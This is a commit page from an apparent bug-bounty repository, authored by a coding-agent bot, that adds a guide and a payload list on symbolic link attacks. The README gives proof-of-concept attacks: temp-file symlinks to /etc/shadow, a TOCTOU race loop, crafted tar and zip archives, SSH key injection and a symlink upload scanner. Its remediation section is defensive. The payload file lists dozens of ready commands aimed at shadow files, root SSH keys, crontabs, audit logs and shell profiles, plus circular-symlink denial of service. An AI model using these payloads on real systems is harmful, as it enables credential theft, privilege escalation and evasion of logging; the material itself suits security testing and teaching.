0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 19:36:33 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add timing attacks, Tor-based attacks, SSJI, symbolic link attacks, and enhanced auth bypass payloads

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-05 15:54:35 +00:00
parent 5c4486169d
commit 1677a567e7
10 changed files with 4302 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Symbolic-Link-Attacks/README.md
+628
View File
@@ -0,0 +1,628 @@
# Symbolic Link Attacks (Symlink Attacks)
## Description
Symbolic link attacks, also known as symlink attacks, exploit the behavior of symbolic links (symlinks) in file systems. A symbolic link is a file that points to another file or directory. Attackers can manipulate symlinks to trick applications into accessing, modifying, or deleting files they shouldn't have access to, leading to privilege escalation, information disclosure, or denial of service.
## How Symbolic Link Attacks Work
When an application follows a symbolic link without proper validation:
1. Attacker creates a symlink pointing to a sensitive file
2. Application attempts to write/read to the symlink path
3. Operation is performed on the target file instead
4. Results in unauthorized file access, modification, or deletion
## Common Vulnerabilities
### 1. **Time-of-Check-Time-of-Use (TOCTOU)**
Application checks file permissions, attacker replaces file with symlink before use.
### 2. **Insecure Temporary File Handling**
Applications create predictable temp files that can be symlinked.
### 3. **Log File Symlink**
Replacing log files with symlinks to sensitive files.
### 4. **Archive Extraction**
Extracting archives containing malicious symlinks.
### 5. **File Upload Symlink**
Uploading symlinks via file upload functionality.
### 6. **Configuration File Symlink**
Symlinking configuration files to gain access or privileges.
### 7. **Backup/Restore Symlink**
Exploiting backup processes that follow symlinks.
## Common Attack Vectors
- Temporary file operations
- Log file handling
- File upload functionality
- Archive extraction (tar, zip)
- Backup/restore operations
- Cache directories
- Configuration file access
- Web server document roots
## Testing Methodology & PoC Examples
### PoC 1: Basic Symlink Attack on Temp Files
**Vulnerability:** Application creates predictable temp files.
**Steps to Test:**
1. Identify temp file creation pattern
2. Create symlink before application creates file
3. Application writes to symlink, modifying target file
**Attack:**
```bash
# Attacker predicts temp file location
# Application will create /tmp/app_12345.tmp
# Attacker creates symlink first
ln -s /etc/passwd /tmp/app_12345.tmp
# When application writes to /tmp/app_12345.tmp,
# it actually writes to /etc/passwd
```
**Python Example:**
```python
import os
import time
# Predict temporary file name
temp_file = f"/tmp/app_{os.getpid()}.tmp"
# Create symlink to target
os.symlink("/etc/shadow", temp_file)
# Wait for application to write to temp file
# Application unknowingly writes to /etc/shadow
```
---
### PoC 2: TOCTOU Race Condition with Symlinks
**Vulnerability:** Time gap between checking and using a file.
**Steps to Test:**
1. Application checks if file is safe
2. Attacker quickly replaces file with symlink
3. Application uses the symlink
**Bash Script:**
```bash
#!/bin/bash
# Exploit TOCTOU vulnerability
TARGET="/path/to/sensitive/file"
EXPLOITED="/path/to/app/data/file.txt"
while true; do
# Remove existing file
rm -f "$EXPLOITED" 2>/dev/null
# Create normal file (passes checks)
touch "$EXPLOITED"
# Quickly replace with symlink
rm -f "$EXPLOITED"
ln -s "$TARGET" "$EXPLOITED"
done
```
**C Example:**
```c
// Vulnerable code
if (access(filename, W_OK) == 0) {
// RACE CONDITION WINDOW
// Attacker can replace file with symlink here
FILE *fp = fopen(filename, "w");
fprintf(fp, "sensitive data");
fclose(fp);
}
```
---
### PoC 3: Log File Symlink Attack
**Vulnerability:** Application writes to log files without checking for symlinks.
**Steps to Test:**
1. Identify log file location
2. Replace log file with symlink to target
3. Application logs trigger write to target file
**Attack:**
```bash
# Application writes to /var/log/app.log
# Attacker replaces log file
rm /var/log/app.log
ln -s /etc/passwd /var/log/app.log
# Application's log writes now corrupt /etc/passwd
```
**Request to trigger logging:**
```http
POST /api/endpoint HTTP/1.1
Host: example.com
Content-Type: application/json
```
**Result:** Log entry written to /etc/passwd instead of log file.
---
### PoC 4: Archive Extraction Symlink Attack (Zip Slip)
**Vulnerability:** Extracting archives containing malicious symlinks.
**Steps to Test:**
1. Create archive with symlinks pointing outside extraction directory
2. Upload or provide archive to application
3. Extraction follows symlinks, writing to unintended locations
**Creating Malicious Archive:**
```bash
# Create malicious tar archive
mkdir evil
cd evil
ln -s /etc/passwd symlink.txt
echo "evil content" > data.txt
cd ..
tar -czf evil.tar.gz evil/
# Or with absolute path symlink
ln -s /etc/passwd /tmp/evil_symlink
tar -czf evil.tar.gz /tmp/evil_symlink
# Zip with symlink
ln -s ../../../etc/passwd symlink
zip --symlinks evil.zip symlink
```
**Python Script to Create Malicious Zip:**
```python
import zipfile
import os
# Create zip with malicious symlink
with zipfile.ZipFile('evil.zip', 'w') as zf:
# Create symlink entry
info = zipfile.ZipInfo('link')
info.create_system = 3 # Unix
info.external_attr = 0o120777 << 16 # Symlink
zf.writestr(info, '../../../etc/passwd')
```
---
### PoC 5: File Upload Symlink Bypass
**Vulnerability:** File upload allows symlink creation.
**Steps to Test:**
1. Create symlink on local system
2. Upload symlink file
3. Access uploaded symlink to read target file
**Creating Symlink for Upload:**
```bash
# Create symlink to sensitive file
ln -s /etc/passwd passwd_link.txt
# Upload passwd_link.txt via web form
# If server preserves symlink and allows access:
curl https://example.com/uploads/passwd_link.txt
# Returns contents of /etc/passwd
```
**Multipart Form Data:**
```http
POST /upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----boundary
------boundary
Content-Disposition: form-data; name="file"; filename="link.txt"
Content-Type: application/octet-stream
<symlink binary data>
------boundary--
```
---
### PoC 6: Configuration File Symlink
**Vulnerability:** Application reads configuration from predictable location.
**Steps to Test:**
1. Identify config file location
2. Create symlink from config location to attacker-controlled file
3. Application reads attacker's configuration
**Attack:**
```bash
# Application reads /etc/app/config.ini
# Attacker creates symlink
rm /etc/app/config.ini
ln -s /tmp/attacker_config.ini /etc/app/config.ini
# Attacker's config file
cat > /tmp/attacker_config.ini << EOF
[auth]
admin_password=hacked
debug_mode=true
EOF
```
---
### PoC 7: Web Document Root Symlink
**Vulnerability:** Web server follows symlinks in document root.
**Steps to Test:**
1. Upload or create symlink in web root
2. Access symlink via browser
3. Read arbitrary files from server
**Attack:**
```bash
# Create symlink in web directory
cd /var/www/html/uploads/
ln -s /etc/passwd passwd.txt
ln -s /home/user/.ssh/id_rsa key.txt
# Access via browser
curl https://example.com/uploads/passwd.txt
# Returns /etc/passwd contents
```
**Apache Configuration Exploitation:**
```apache
# If Options FollowSymLinks is enabled
<Directory /var/www/html>
Options FollowSymLinks # Vulnerable!
</Directory>
```
---
### PoC 8: Backup Symlink Attack
**Vulnerability:** Backup process follows symlinks.
**Steps to Test:**
1. Identify backup process and source directory
2. Create symlinks in backup source pointing to sensitive files
3. Backup includes sensitive files
**Attack:**
```bash
# Application backs up /home/user/data/
# Attacker creates symlinks in data directory
cd /home/user/data/
ln -s /etc/shadow shadow_backup
ln -s /root/.ssh/id_rsa root_key
# Backup process follows symlinks and includes sensitive files
# Attacker extracts sensitive files from backup archive
```
---
### PoC 9: Cache Directory Symlink
**Vulnerability:** Application caches data in directory with weak permissions.
**Steps to Test:**
1. Identify cache directory
2. Replace cache file with symlink
3. Application writes cached data to target file
**Attack:**
```bash
# Application caches to /tmp/app_cache/user_123
# Attacker creates symlink
rm -rf /tmp/app_cache/user_123
ln -s /home/victim/.ssh/authorized_keys /tmp/app_cache/user_123
# Application writes cache data (containing attacker's SSH key)
# to victim's authorized_keys file
```
---
### PoC 10: Symlink Directory Traversal
**Vulnerability:** Application accepts file paths without proper validation.
**Steps to Test:**
1. Create symlink chain for directory traversal
2. Use symlinks to access files outside intended directory
**Attack:**
```bash
# Create symlink chain
mkdir -p /tmp/uploads/a/b/c
cd /tmp/uploads
ln -s / a/b/c/root
# Request file via application
GET /api/download?file=a/b/c/root/etc/passwd
# Application follows symlink to /etc/passwd
```
---
## Exploitation Techniques
### 1. **Privilege Escalation**
```bash
# Replace /etc/passwd with symlink to attacker-controlled file
# When application writes to "passwd", it writes to attacker's file
ln -s /tmp/attacker_passwd /etc/passwd
```
### 2. **SSH Key Injection**
```bash
# Symlink authorized_keys
ln -s /tmp/attacker_keys /home/victim/.ssh/authorized_keys
# Application writes attacker's key to authorized_keys
```
### 3. **Configuration Override**
```bash
# Symlink config file
ln -s /tmp/evil_config /etc/app/app.conf
```
### 4. **Arbitrary File Read**
```bash
# Symlink in web root
ln -s /etc/passwd /var/www/html/exposed.txt
```
### 5. **Arbitrary File Write**
```bash
# Symlink temp file to target
ln -s /etc/crontab /tmp/app_temp_file
```
### 6. **Denial of Service**
```bash
# Symlink to /dev/zero or /dev/random
ln -s /dev/zero /var/log/app.log
# Application hangs trying to read infinite data
```
## Detection and Testing Tools
### 1. **Manual Testing**
```bash
# Check if symlinks are followed
ln -s /etc/passwd test_link.txt
# Upload and access test_link.txt
# Check temp file creation
strace -e openat,open application 2>&1 | grep tmp
```
### 2. **Automated Testing Script**
```python
import os
import time
import requests
def test_symlink_vulnerability(upload_url, access_url):
# Create symlink to /etc/passwd
symlink_name = "test_symlink.txt"
os.symlink("/etc/passwd", symlink_name)
# Upload symlink
with open(symlink_name, 'rb') as f:
files = {'file': f}
response = requests.post(upload_url, files=files)
# Try to access symlink
response = requests.get(f"{access_url}/{symlink_name}")
if "root:" in response.text:
print("[!] Symlink vulnerability confirmed!")
print(response.text)
else:
print("[+] No vulnerability detected")
# Cleanup
os.remove(symlink_name)
```
### 3. **Archive Testing**
```bash
# Create test archive with symlink
ln -s /etc/passwd testlink
tar -czf test.tar.gz testlink
# Upload and extract
# Check if extraction follows symlink
```
### 4. **TOCTOU Race Condition Testing**
```bash
# Run in parallel
while true; do
rm -f target_file
touch target_file
rm -f target_file
ln -s /etc/passwd target_file
done &
# Meanwhile, trigger application to use target_file
```
## Exploitation Impact
- **Critical:** Arbitrary file read/write, privilege escalation
- **High:** SSH key injection, configuration manipulation
- **Medium:** Information disclosure, DoS
- **Data Breach:** Access to sensitive files (passwords, keys, configs)
## Remediation
### 1. **Never Follow Symlinks**
```python
# Bad - Follows symlinks
with open(filename, 'r') as f:
data = f.read()
# Good - Check for symlink first
import os
if os.path.islink(filename):
raise Exception("Symlinks not allowed")
with open(filename, 'r') as f:
data = f.read()
```
### 2. **Use O_NOFOLLOW Flag**
```c
// Open file without following symlinks
int fd = open(filename, O_RDONLY | O_NOFOLLOW);
if (fd == -1 && errno == ELOOP) {
// File is a symlink
printf("Symlink detected, access denied\n");
}
```
### 3. **Validate File Paths**
```python
import os
import pathlib
def is_safe_path(basedir, path):
# Resolve both paths
base = pathlib.Path(basedir).resolve()
target = pathlib.Path(path).resolve()
# Check if target is within basedir
try:
target.relative_to(base)
return True
except ValueError:
return False
```
### 4. **Use Secure Temporary Files**
```python
import tempfile
# Secure temp file creation
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(b"data")
temp_filename = f.name
```
### 5. **Disable Symlinks in Web Server**
```apache
# Apache
<Directory /var/www/html>
Options -FollowSymLinks
</Directory>
# Nginx
disable_symlinks on;
```
### 6. **Check File Type Before Operations**
```bash
# Check if file is a regular file
if [ -f "$file" ] && [ ! -L "$file" ]; then
cat "$file"
else
echo "Not a regular file or is a symlink"
fi
```
### 7. **Use chroot or Containers**
- Isolate application in restricted environment
- Limit file system access
### 8. **Atomic Operations**
```c
// Use O_EXCL to fail if file exists
int fd = open(filename, O_CREAT | O_EXCL | O_WRONLY, 0600);
if (fd == -1) {
perror("File already exists");
exit(1);
}
```
### 9. **File Permission Checks**
```python
import os
import stat
def is_safe_file(path):
try:
st = os.lstat(path) # lstat doesn't follow symlinks
# Check if it's a symlink
if stat.S_ISLNK(st.st_mode):
return False
# Check if it's a regular file
if not stat.S_ISREG(st.st_mode):
return False
return True
except OSError:
return False
```
### 10. **Input Validation for Archives**
```python
import tarfile
import os
def safe_extract(tar_path, extract_path):
with tarfile.open(tar_path, 'r') as tar:
for member in tar.getmembers():
# Check for absolute paths
if member.name.startswith('/'):
raise Exception("Absolute path in archive")
# Check for path traversal
if '..' in member.name:
raise Exception("Path traversal in archive")
# Check if symlink
if member.issym() or member.islnk():
raise Exception("Symlinks not allowed in archive")
# Safe extraction
tar.extract(member, extract_path)
```
## References
- [CWE-59: Improper Link Resolution Before File Access](https://cwe.mitre.org/data/definitions/59.html)
- [CWE-61: UNIX Symbolic Link Following](https://cwe.mitre.org/data/definitions/61.html)
- [CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition](https://cwe.mitre.org/data/definitions/367.html)
- [OWASP - Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
- [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability)
## Payloads
See `symbolic-link-payloads.txt` for a comprehensive list of symlink attack payloads and techniques.
See `symbolic-link-payloads.txt` for a comprehensive list of symlink attack payloads and techniques.
Symbolic-Link-Attacks/symbolic-link-payloads.txt
+436
View File
@@ -0,0 +1,436 @@
# Symbolic Link Attack Payloads
# ============================================
# 1. BASIC SYMLINK CREATION
# ============================================
# Create symlink to sensitive files
ln -s /etc/passwd passwd_link.txt
ln -s /etc/shadow shadow_link.txt
ln -s /etc/hosts hosts_link.txt
ln -s /root/.ssh/id_rsa root_key_link
ln -s /home/user/.ssh/authorized_keys auth_keys_link
# Symlink to directories
ln -s /etc/ etc_link
ln -s /root/ root_link
ln -s / rootfs_link
ln -s /var/log/ logs_link
# ============================================
# 2. TEMPORARY FILE SYMLINK ATTACKS
# ============================================
# Predict and create temp file symlinks
ln -s /etc/passwd /tmp/app_12345.tmp
ln -s /etc/shadow /tmp/temp_file_$$.tmp
ln -s /root/.ssh/id_rsa /tmp/upload_temp.txt
ln -s /etc/crontab /var/tmp/app_session
# Common temp file patterns
ln -s /etc/passwd /tmp/php_upload_12345
ln -s /etc/passwd /tmp/mysql.sock
ln -s /etc/passwd /var/tmp/sess_abcd1234
# ============================================
# 3. LOG FILE SYMLINK ATTACKS
# ============================================
# Replace log files with symlinks
ln -s /etc/passwd /var/log/app.log
ln -s /etc/shadow /var/log/error.log
ln -s /home/user/.ssh/authorized_keys /var/log/access.log
ln -s /etc/crontab /var/log/system.log
# Symlink to /dev/null for DoS
ln -s /dev/null /var/log/app.log
# Symlink to /dev/zero for infinite data
ln -s /dev/zero /var/log/app.log
# ============================================
# 4. WEB ROOT SYMLINK ATTACKS
# ============================================
# Create symlinks in web directories
ln -s /etc/passwd /var/www/html/passwd.txt
ln -s /etc/shadow /var/www/html/shadow.txt
ln -s /root/.ssh/id_rsa /var/www/html/key.txt
ln -s /home/user/.bash_history /var/www/html/history.txt
ln -s /var/log/apache2/access.log /var/www/html/access.txt
# Symlink to entire directories
ln -s /etc/ /var/www/html/etc
ln -s /root/ /var/www/html/root
ln -s /home/ /var/www/html/home
# PHP uploads directory
ln -s /etc/passwd /var/www/html/uploads/passwd.txt
ln -s /etc/passwd /var/www/html/files/config.txt
# ============================================
# 5. CONFIGURATION FILE SYMLINK
# ============================================
# Replace config files
ln -s /tmp/attacker_config /etc/app/app.conf
ln -s /tmp/evil.ini /etc/app/database.ini
ln -s /tmp/settings.xml /etc/app/settings.xml
# MySQL config
ln -s /tmp/evil.cnf /etc/mysql/my.cnf
# Apache config
ln -s /tmp/evil.conf /etc/apache2/sites-enabled/000-default.conf
# ============================================
# 6. SSH KEY INJECTION SYMLINKS
# ============================================
# Symlink authorized_keys
ln -s /tmp/attacker_keys /home/victim/.ssh/authorized_keys
ln -s /tmp/attacker_keys /root/.ssh/authorized_keys
# Symlink SSH config
ln -s /tmp/evil_ssh_config /home/user/.ssh/config
# Symlink known_hosts
ln -s /dev/null /home/user/.ssh/known_hosts
# ============================================
# 7. ARCHIVE EXTRACTION SYMLINKS (ZIP SLIP)
# ============================================
# Bash commands to create malicious archives
# Tar archive with symlink to /etc/passwd
ln -s /etc/passwd evil_link.txt
tar -czf evil.tar.gz evil_link.txt
# Tar with absolute path symlink
ln -s /etc/shadow /tmp/shadow_link
tar -czf evil.tar.gz /tmp/shadow_link
# Tar with directory traversal symlink
mkdir -p a/b/c
ln -s ../../../etc/passwd a/b/c/passwd
tar -czf evil.tar.gz a/
# Zip with symlink
ln -s /etc/passwd passwd_link
zip --symlinks evil.zip passwd_link
# Zip with path traversal
ln -s ../../../../../../etc/passwd link
zip --symlinks evil.zip link
# ============================================
# 8. BACKUP SYMLINK ATTACKS
# ============================================
# Place symlinks in backup source directory
cd /home/user/backup_source/
ln -s /etc/shadow shadow_backup.txt
ln -s /root/.ssh/id_rsa root_key.txt
ln -s /var/log/auth.log auth_log.txt
ln -s /etc/mysql/debian.cnf mysql_creds.txt
# Symlink entire sensitive directories
ln -s /root/.ssh/ ssh_dir_backup
ln -s /etc/ etc_backup
# ============================================
# 9. CACHE DIRECTORY SYMLINKS
# ============================================
# Replace cache files with symlinks
ln -s /etc/passwd /tmp/app_cache/user_data
ln -s /home/victim/.ssh/authorized_keys /var/cache/app/session_123
ln -s /etc/crontab /var/tmp/cache/data_456
# ============================================
# 10. FILE UPLOAD SYMLINK EXPLOITATION
# ============================================
# Create symlinks for upload testing
ln -s /etc/passwd upload_passwd.txt
ln -s /etc/shadow upload_shadow.txt
ln -s /root/.ssh/id_rsa upload_key.pem
ln -s /proc/self/environ upload_env.txt
# Symlink with allowed extension
ln -s /etc/passwd document.pdf
ln -s /etc/passwd image.jpg
ln -s /etc/passwd file.txt
# ============================================
# 11. TOCTOU RACE CONDITION PAYLOADS
# ============================================
# Continuous race condition exploit
while true; do
rm -f /tmp/target_file 2>/dev/null
touch /tmp/target_file
rm -f /tmp/target_file
ln -s /etc/passwd /tmp/target_file
sleep 0.001
done
# Python TOCTOU exploit
# import os, time
# while True:
# try:
# os.remove('/tmp/target')
# open('/tmp/target', 'w').close()
# os.remove('/tmp/target')
# os.symlink('/etc/passwd', '/tmp/target')
# except: pass
# ============================================
# 12. SYMLINK DIRECTORY TRAVERSAL
# ============================================
# Create symlink chains for traversal
mkdir -p /tmp/uploads/a/b/c/d/e
cd /tmp/uploads
ln -s / a/b/c/d/e/root
# Multiple level traversal
ln -s ../../../../../../../etc/passwd link1.txt
ln -s ../../../../../../etc/shadow link2.txt
# Relative path symlinks
cd /var/www/html/uploads
ln -s ../../../etc/passwd passwd.txt
# ============================================
# 13. CRON JOB SYMLINK ATTACKS
# ============================================
# Symlink crontab
ln -s /tmp/evil_cron /var/spool/cron/crontabs/root
ln -s /tmp/attacker_cron /etc/cron.d/custom
# Symlink cron scripts
ln -s /tmp/evil_script.sh /etc/cron.daily/backup
# ============================================
# 14. DATABASE SYMLINK ATTACKS
# ============================================
# MySQL data directory symlinks
ln -s /etc/passwd /var/lib/mysql/database/table.MYD
# PostgreSQL symlinks
ln -s /etc/shadow /var/lib/postgresql/data/pg_hba.conf
# SQLite database symlinks
ln -s /etc/passwd /var/www/app/database.sqlite
# ============================================
# 15. SESSION FILE SYMLINKS
# ============================================
# PHP session symlinks
ln -s /etc/passwd /var/lib/php/sessions/sess_abc123
ln -s /tmp/attacker_session /var/lib/php/sessions/sess_victim
# Application session symlinks
ln -s /etc/shadow /tmp/sessions/user_session_123
# ============================================
# 16. PACKAGE/DEPENDENCY SYMLINKS
# ============================================
# NPM/Node modules
ln -s /tmp/evil_module /var/www/app/node_modules/package
# Python site-packages
ln -s /tmp/evil_module.py /usr/lib/python3/site-packages/module.py
# ============================================
# 17. SYSTEMD/INIT SYMLINKS
# ============================================
# Systemd service symlinks
ln -s /tmp/evil.service /etc/systemd/system/app.service
# Init script symlinks
ln -s /tmp/evil_script /etc/init.d/custom_service
# ============================================
# 18. MAIL SPOOL SYMLINKS
# ============================================
# Mail spool symlinks
ln -s /etc/shadow /var/mail/root
ln -s /root/.ssh/id_rsa /var/spool/mail/user
# ============================================
# 19. PRINTER/DEVICE SYMLINKS
# ============================================
# Symlink to devices
ln -s /dev/random /tmp/data_file
ln -s /dev/zero /var/log/app.log
ln -s /dev/null /tmp/output.txt
# Printer spool
ln -s /etc/passwd /var/spool/cups/tmp/job_123
# ============================================
# 20. DOCKER/CONTAINER SYMLINKS
# ============================================
# Docker volume symlinks
ln -s /etc/passwd /var/lib/docker/volumes/app/_data/config.txt
# Container mount symlinks
ln -s /host/etc/passwd /container/app/data/passwd.txt
# ============================================
# 21. GIT REPOSITORY SYMLINKS
# ============================================
# Git hooks symlinks
ln -s /tmp/evil_hook.sh /var/www/app/.git/hooks/pre-commit
# Git config symlinks
ln -s /tmp/evil_config /var/www/app/.git/config
# ============================================
# 22. COMPILER/BUILD SYMLINKS
# ============================================
# Include file symlinks
ln -s /etc/passwd /usr/include/config.h
# Library symlinks
ln -s /tmp/evil.so /usr/lib/libapp.so
# ============================================
# 23. BROWSER CACHE SYMLINKS
# ============================================
# Browser profile symlinks
ln -s /etc/passwd ~/.mozilla/firefox/profile/prefs.js
ln -s /etc/shadow ~/.config/google-chrome/Default/Preferences
# ============================================
# 24. SETUID/SETGID SYMLINKS
# ============================================
# Symlinks to setuid binaries (for analysis)
ln -s /usr/bin/sudo /tmp/sudo_link
ln -s /usr/bin/passwd /tmp/passwd_link
# ============================================
# 25. PROCFS SYMLINKS
# ============================================
# Process information symlinks
ln -s /proc/self/environ /var/www/html/env.txt
ln -s /proc/self/cmdline /tmp/cmdline.txt
ln -s /proc/self/cwd /tmp/cwd_link
ln -s /proc/self/fd/0 /tmp/stdin_link
# ============================================
# 26. NETWORK CONFIGURATION SYMLINKS
# ============================================
# Network config symlinks
ln -s /tmp/evil_hosts /etc/hosts
ln -s /tmp/evil_resolv /etc/resolv.conf
ln -s /tmp/evil_network /etc/network/interfaces
# ============================================
# 27. USER PROFILE SYMLINKS
# ============================================
# Shell profile symlinks
ln -s /tmp/evil_bashrc /home/user/.bashrc
ln -s /tmp/evil_profile /home/user/.profile
ln -s /tmp/evil_zshrc /home/user/.zshrc
# ============================================
# 28. MONITORING/AUDIT SYMLINKS
# ============================================
# Audit log symlinks
ln -s /dev/null /var/log/audit/audit.log
# Monitoring config symlinks
ln -s /tmp/evil_config /etc/nagios/nrpe.cfg
# ============================================
# 29. CLOUD METADATA SYMLINKS
# ============================================
# AWS metadata symlinks (if accessible)
ln -s /proc/self/environ /var/www/html/aws_metadata.txt
# ============================================
# 30. RECURSIVE SYMLINK (DoS)
# ============================================
# Create circular symlinks for DoS
ln -s /tmp/link1 /tmp/link2
ln -s /tmp/link2 /tmp/link1
# Self-referential symlink
ln -s /tmp/selflink /tmp/selflink
# ============================================
# TESTING COMMANDS
# ============================================
# Check if file is a symlink
test -L /path/to/file && echo "Is a symlink"
# List symlinks
find /path -type l
# Show symlink target
readlink /path/to/symlink
ls -l /path/to/symlink
# Create symlink with specific name
ln -s /target /symlink_name
# Force create symlink (overwrite existing)
ln -sf /target /symlink_name
# Create relative symlink
ln -sr /target /symlink_name
# ============================================
# PREVENTION TESTING
# ============================================
# Test if application follows symlinks
ln -s /etc/passwd /tmp/test_symlink.txt
# Upload/access /tmp/test_symlink.txt
# If contents of /etc/passwd are returned, vulnerable
# Test O_NOFOLLOW behavior
# Create symlink and try to open it
# Should fail with ELOOP error if protected
# Test path validation
ln -s /etc/passwd allowed_dir/../../etc/passwd_link
# Try to access via application
# ============================================
# WINDOWS EQUIVALENTS (JUNCTION/MKLINK)
# ============================================
# Windows symbolic links (requires admin)
# mklink /D link target_directory
# mklink file_link target_file
# Windows junctions (no admin required)
# mklink /J junction_dir target_directory
# Example payloads (Windows)
# mklink passwd.txt C:\Windows\System32\config\SAM
# mklink /D sensitive_dir C:\Users\Administrator